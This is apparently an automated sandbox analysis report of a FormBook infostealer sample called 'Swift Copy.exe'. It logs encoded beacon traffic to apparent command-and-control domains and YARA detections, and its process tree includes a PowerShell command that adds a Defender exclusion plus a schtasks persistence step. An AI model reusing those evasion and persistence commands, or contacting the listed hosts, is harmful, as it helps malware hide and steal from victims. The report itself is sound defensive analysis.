                                                Aug 11, 2022 06:29:55.693173885 CEST11856OUTGET /bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=M79ygOKZB+LrmWtJBQqMyCe4o1I9YkrzlNkt4Y5lQSVrtsHmDN4rDqK6jdbIqfImlF05yj9AnCTnfqfBJ/tqveG/rYA7nf00SA== HTTP/1.1
                                                Host: www.kinemartigues.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Aug 11, 2022 06:29:55.733656883 CEST11857INHTTP/1.1 301 Moved Permanently
                                                Date: Thu, 11 Aug 2022 04:29:55 GMT
                                                Server: Apache
                                                Location: https://www.kinemartigues.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=M79ygOKZB+LrmWtJBQqMyCe4o1I9YkrzlNkt4Y5lQSVrtsHmDN4rDqK6jdbIqfImlF05yj9AnCTnfqfBJ/tqveG/rYA7nf00SA==
                                                Content-Length: 376
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 69 6e 65 6d 61 72 74 69 67 75 65 73 2e 63 6f 6d 2f 62 77 65 30 2f 3f 59 4e 39 3d 77 36 50 54 70 36 70 70 2d 5a 66 74 65 32 61 30 26 61 6d 70 3b 39 72 56 38 7a 6c 3d 4d 37 39 79 67 4f 4b 5a 42 2b 4c 72 6d 57 74 4a 42 51 71 4d 79 43 65 34 6f 31 49 39 59 6b 72 7a 6c 4e 6b 74 34 59 35 6c 51 53 56 72 74 73 48 6d 44 4e 34 72 44 71 4b 36 6a 64 62 49 71 66 49 6d 6c 46 30 35 79 6a 39 41 6e 43 54 6e 66 71 66 42 4a 2f 74 71 76 65 47 2f 72 59 41 37 6e 66 30 30 53 41 3d 3d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.kinemartigues.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&amp;9rV8zl=M79ygOKZB+LrmWtJBQqMyCe4o1I9YkrzlNkt4Y5lQSVrtsHmDN4rDqK6jdbIqfImlF05yj9AnCTnfqfBJ/tqveG/rYA7nf00SA==">here</a>.</p></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                5192.168.2.349822103.67.235.12080C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Aug 11, 2022 06:30:01.027570009 CEST11858OUTPOST /bwe0/ HTTP/1.1
                                                Host: www.epic45.co.uk
                                                Connection: close
                                                Content-Length: 412
                                                Cache-Control: no-cache
                                                Origin: http://www.epic45.co.uk
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Content-Type: application/x-www-form-urlencoded
                                                Accept: */*
                                                Referer: http://www.epic45.co.uk/bwe0/
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Data Raw: 39 72 56 38 7a 6c 3d 37 33 46 44 59 52 4b 62 51 55 65 6b 6e 4e 72 35 6d 35 77 70 70 4a 66 6a 4c 6a 65 54 6b 43 74 32 64 71 71 4c 43 68 42 78 62 34 65 36 59 73 33 4f 32 5f 28 78 59 74 54 62 4d 4b 4f 35 7a 42 4d 4b 54 49 63 4d 35 6f 54 4e 39 58 42 31 36 72 58 36 57 7a 41 37 72 66 6b 73 4e 4a 70 74 34 59 78 54 55 6e 39 59 71 34 39 46 4f 42 49 48 46 48 59 74 57 47 62 38 69 5a 4b 46 7e 4e 63 39 41 36 42 6c 39 68 4e 43 76 6d 73 57 75 75 77 50 4e 5a 7e 32 7e 33 39 74 69 42 75 4f 56 36 45 7a 79 69 54 57 59 48 42 4f 42 49 74 6d 6a 5a 4e 68 31 42 47 50 35 49 69 78 6f 65 76 65 63 52 45 53 6e 66 50 43 78 50 5a 4a 72 75 77 78 30 72 6d 68 74 6a 34 75 5a 41 50 46 71 5f 59 6a 61 4b 4b 36 53 71 7e 68 55 46 6e 44 67 37 54 38 41 36 52 2d 77 33 4c 54 57 41 30 52 4b 5a 77 30 31 69 33 4d 72 45 32 35 38 63 46 6d 74 4d 39 5a 35 54 7a 31 41 69 38 4e 45 32 6d 67 36 64 37 65 41 59 46 5f 30 6f 77 64 77 6c 45 51 56 44 51 65 51 4a 78 50 59 2d 61 4e 72 52 36 57 67 62 30 4f 4b 34 37 63 41 72 34 5a 4b 6b 6c 75 6f 63 36 75 36 46 4d 61 62 5a 42 32 74 63 70 49 6f 7a 73 63 75 72 32 43 75 34 46 44 73 77 77 5f 4c 69 48 41 32 66 6e 2d 59 53 7e 64 58 37 32 42 74 37 4d 61 57 67 31 57 67 6d 42 78 77 38 63 31 28 76 66 70 38 4e 69 7a 79 50 53 4a 67 51 29 2e 00 00 00 00 00 00 00 00
                                                Data Ascii: 9rV8zl=73FDYRKbQUeknNr5m5wppJfjLjeTkCt2dqqLChBxb4e6Ys3O2_(xYtTbMKO5zBMKTIcM5oTN9XB16rX6WzA7rfksNJpt4YxTUn9Yq49FOBIHFHYtWGb8iZKF~Nc9A6Bl9hNCvmsWuuwPNZ~2~39tiBuOV6EzyiTWYHBOBItmjZNh1BGP5IixoevecRESnfPCxPZJruwx0rmhtj4uZAPFq_YjaKK6Sq~hUFnDg7T8A6R-w3LTWA0RKZw01i3MrE258cFmtM9Z5Tz1Ai8NE2mg6d7eAYF_0owdwlEQVDQeQJxPY-aNrR6Wgb0OK47cAr4ZKkluoc6u6FMabZB2tcpIozscur2Cu4FDsww_LiHA2fn-YS~dX72Bt7MaWg1WgmBxw8c1(vfp8NizyPSJgQ).
                                                Aug 11, 2022 06:30:01.248380899 CEST11859INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Thu, 11 Aug 2022 04:30:01 GMT
                                                Content-Type: text/html; charset=iso-8859-1
                                                Content-Length: 393
                                                Connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 65 70 69 63 34 35 2e 63 6f 2e 75 6b 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at epic45.co.uk Port 80</address></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                6192.168.2.349823103.67.235.12080C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Aug 11, 2022 06:30:03.300090075 CEST11859OUTGET /bwe0/?9rV8zl=21tjbkChbFWznsu0s5dQgMCLDQHTp3tJL/2kMDFZYsfdSZfl+tTwQu/FIpmHzzlEQrwumqO36HFfwo3EfD1Crt0mHKlMwrNEfw==&YN9=w6PTp6pp-Zfte2a0 HTTP/1.1
                                                Host: www.epic45.co.uk
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Aug 11, 2022 06:30:03.520287991 CEST11860INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Thu, 11 Aug 2022 04:30:03 GMT
                                                Content-Type: text/html; charset=iso-8859-1
                                                Content-Length: 393
                                                Connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 65 70 69 63 34 35 2e 63 6f 2e 75 6b 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at epic45.co.uk Port 80</address></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                7192.168.2.349825103.92.235.5580C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Aug 11, 2022 06:30:09.121141911 CEST11870OUTPOST /bwe0/ HTTP/1.1
                                                Host: www.mogdento.com
                                                Connection: close
                                                Content-Length: 412
                                                Cache-Control: no-cache
                                                Origin: http://www.mogdento.com
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Content-Type: application/x-www-form-urlencoded
                                                Accept: */*
                                                Referer: http://www.mogdento.com/bwe0/
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Data Raw: 39 72 56 38 7a 6c 3d 54 48 56 65 71 57 49 4c 62 30 44 33 79 56 36 4d 38 64 75 30 4f 69 77 5f 64 46 49 30 49 61 53 46 4c 6e 77 7a 28 37 6f 72 6e 33 48 6a 64 75 7a 78 79 7a 47 48 61 41 50 6b 37 77 57 49 47 67 71 37 5a 63 6e 77 56 53 39 2d 71 76 63 72 4f 30 6a 70 67 63 61 54 79 38 56 78 56 37 54 46 72 54 4a 33 35 46 48 49 45 79 68 6f 76 33 65 70 64 76 42 4d 66 39 34 41 79 6a 47 2d 49 52 6f 34 6f 64 59 4f 4b 6f 37 58 74 64 5a 36 6f 74 47 71 30 7a 48 6f 49 74 62 39 6d 78 78 74 4d 51 56 2d 7e 64 75 43 63 78 63 2d 38 36 7a 31 38 4f 53 77 31 4a 6b 6a 4e 32 4b 6b 76 4b 43 76 50 39 34 41 56 79 6a 78 56 38 67 6a 6a 32 30 45 4b 39 41 38 45 50 48 43 71 76 49 4c 62 4d 28 74 62 71 46 6b 42 33 7e 4f 30 49 6b 36 69 73 46 52 62 75 75 78 7e 51 28 62 50 6d 5a 78 78 6c 43 43 70 70 69 5f 7e 4f 4c 77 49 68 4d 67 30 33 28 6e 59 78 32 64 56 31 35 4e 37 66 46 48 77 67 65 4a 68 59 4a 53 28 2d 7e 54 76 35 4f 33 47 4c 46 30 75 51 30 4b 69 49 34 74 48 41 44 55 6f 67 66 33 38 68 6b 41 4c 5f 4d 70 6c 4d 38 53 46 6a 39 45 4a 48 66 4b 6e 38 54 6d 66 31 77 43 63 5f 42 32 5a 71 59 31 59 4a 52 73 33 76 57 58 73 58 5a 41 68 73 4c 62 4c 59 59 33 56 5f 64 36 31 71 56 34 41 66 7e 79 65 6d 57 78 50 69 4d 6e 50 61 43 39 46 61 57 69 57 6c 4b 55 65 77 29 2e 00 00 00 00 00 00 00 00
                                                Data Ascii: 9rV8zl=THVeqWILb0D3yV6M8du0Oiw_dFI0IaSFLnwz(7orn3HjduzxyzGHaAPk7wWIGgq7ZcnwVS9-qvcrO0jpgcaTy8VxV7TFrTJ35FHIEyhov3epdvBMf94AyjG-IRo4odYOKo7XtdZ6otGq0zHoItb9mxxtMQV-~duCcxc-86z18OSw1JkjN2KkvKCvP94AVyjxV8gjj20EK9A8EPHCqvILbM(tbqFkB3~O0Ik6isFRbuux~Q(bPmZxxlCCppi_~OLwIhMg03(nYx2dV15N7fFHwgeJhYJS(-~Tv5O3GLF0uQ0KiI4tHADUogf38hkAL_MplM8SFj9EJHfKn8Tmf1wCc_B2ZqY1YJRs3vWXsXZAhsLbLYY3V_d61qV4Af~yemWxPiMnPaC9FaWiWlKUew).
                                                Aug 11, 2022 06:30:10.063811064 CEST11876INHTTP/1.1 404 Not Found
                                                Date: Thu, 11 Aug 2022 04:30:09 GMT
                                                Server: Apache
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                Link: <https://mogdento.com/wp-json/>; rel="https://api.w.org/"
                                                Connection: close
                                                Transfer-Encoding: chunked
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 33 65 33 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6e 6f 2d 73 76 67 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 39 2e 34 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 4d 4f 47 44 45 4e 54 4f 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 4d 4f 47 44 45 4e 54 4f 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 4f 47 44 45 4e 54 4f 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 4f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 6f 67 64 65 6e 74 6f 2e 63 6f 6d 2f 23 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 2c 22 6e 61 6d 65 22 3a 22 4d 4f 47 44 45 4e 54 4f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 6f 67 64 65 6e 74 6f 2e 63 6f 6d 2f 22 2c 22 73 61 6d 65 41 73 22 3a 5b 5d 2c 22 6c 6f 67 6f 22 3a 7b 22 40 74 79 70 65 22 3a 22 49 6d 61 67 65 4f 62 6a 65 63 74 22 2c 22 69 6e 4c 61 6e 67 75 61 67 65 22 3a 22 65 6e 2d 55 53 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 6f 67 64 65 6e 74 6f 2e 63 6f 6d 2f 23 2f 73 63 68 65 6d 61 2f 6c 6f 67 6f 2f 69 6d 61 67 65 2f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 6f 67 64 65 6e 74 6f 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 32 2f 30 37 2f 63 72 6f 70 70 65 64 2d 57 68 61 74 73 41 70 70 2d 49 6d 61 67 65 2d 32 30 32 32 2d 30 37 2d 32 35 2d 61 74 2d 31 31 2e 30 30 2e 31 36 2d 41 4d 2e 6a 70 65 67 22 2c 22 63 6f 6e 74 65 6e 74 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 6f 67 64 65 6e 74 6f 2e 63 6f 6d
                                                Data Ascii: 3e30<!DOCTYPE html><html lang="en-US" class="no-js no-svg"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v19.4 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found - MOGDENTO</title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found - MOGDENTO" /><meta property="og:site_name" content="MOGDENTO" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://mogdento.com/#organization","name":"MOGDENTO","url":"https://mogdento.com/","sameAs":[],"logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https://mogdento.com/#/schema/logo/image/","url":"https://mogdento.com/wp-content/uploads/2022/07/cropped-WhatsApp-Image-2022-07-25-at-11.00.16-AM.jpeg","contentUrl":"https://mogdento.com


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                8192.168.2.349828103.92.235.5580C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Aug 11, 2022 06:30:11.325797081 CEST11911OUTGET /bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=eF9+phILUgzUwHPh2LCdIS8sbnczPqTtIgth+oM8i1bVTrz46wPYQwCayAKWOCT9dODOCAwfo9QBDVHWgp/MlMRCDLLRs2he6w== HTTP/1.1
                                                Host: www.mogdento.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Aug 11, 2022 06:30:12.432917118 CEST11911INHTTP/1.1 301 Moved Permanently
                                                Date: Thu, 11 Aug 2022 04:30:11 GMT
                                                Server: Apache
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                X-Redirect-By: WordPress
                                                Location: http://mogdento.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=eF9+phILUgzUwHPh2LCdIS8sbnczPqTtIgth+oM8i1bVTrz46wPYQwCayAKWOCT9dODOCAwfo9QBDVHWgp/MlMRCDLLRs2he6w==
                                                Content-Length: 0
                                                Connection: close
                                                Content-Type: text/html; charset=UTF-8


                                                Statistics

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:06:28:04
                                                Start date:11/08/2022
                                                Path:C:\Users\user\Desktop\Swift Copy.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\Swift Copy.exe"
                                                Imagebase:0x30000
                                                File size:951808 bytes
                                                MD5 hash:50D4FB3F5A33007C2F80E5BBAA5E0CCD
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.286746529.0000000002670000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.284828644.0000000002420000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                General

                                                Target ID:4
                                                Start time:06:28:17
                                                Start date:11/08/2022
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe
                                                Imagebase:0xb70000
                                                File size:430592 bytes
                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Reputation:high

                                                General

                                                Target ID:5
                                                Start time:06:28:17
                                                Start date:11/08/2022
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7c9170000
                                                File size:625664 bytes
                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Target ID:6
                                                Start time:06:28:17
                                                Start date:11/08/2022
                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ImUIYlbLTIh" /XML "C:\Users\user\AppData\Local\Temp\tmpE16E.tmp
                                                Imagebase:0xc30000
                                                File size:185856 bytes
                                                MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Target ID:7
                                                Start time:06:28:21
                                                Start date:11/08/2022
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7c9170000
                                                File size:625664 bytes
                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Target ID:8
                                                Start time:06:28:23
                                                Start date:11/08/2022
                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                Imagebase:0xe50000
                                                File size:45152 bytes
                                                MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:high

                                                General

                                                Target ID:11
                                                Start time:06:28:27
                                                Start date:11/08/2022
                                                Path:C:\Windows\explorer.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\Explorer.EXE
                                                Imagebase:0x7ff6b8cf0000
                                                File size:3933184 bytes
                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
